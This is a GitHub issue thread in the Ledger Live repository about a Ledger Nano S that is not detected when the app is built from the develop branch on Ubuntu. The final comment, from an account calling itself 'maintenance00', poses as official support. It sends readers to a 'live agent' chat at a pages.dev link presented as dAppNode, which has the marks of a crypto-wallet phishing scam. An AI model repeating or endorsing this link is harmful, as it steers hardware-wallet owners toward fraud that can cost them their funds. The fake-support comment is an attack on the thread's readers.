### ISSUE TITLE
[Bug]: ledger nano S not detected

### ISSUE THREAD

**Issue by rllola** [LedgerHQ/ledger-live#7238]
### Describe the bug

I built the ledger live app using the `develop` branch and try to connect my nano s to it but it is not being detected. When I am using the latest official release it is working fine.

I am on Ubuntu.

### Expected behavior

My ledger nano s should detected.

### Additional context

Other people using macOS couldn't build it at all so they couldn't try to reproduce the issue.

**Comment by Cognacy** [comment]
hello are you able to resolve this?

**Comment by rllola** [comment]
No I wasn't.

**Comment by maintenance00** [comment]
This issue has been preview on the Pull Requests. To resolve,
Contact the dAppNode page to initiate a chat with the live agent on the chat button to get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)
Thank you for posting
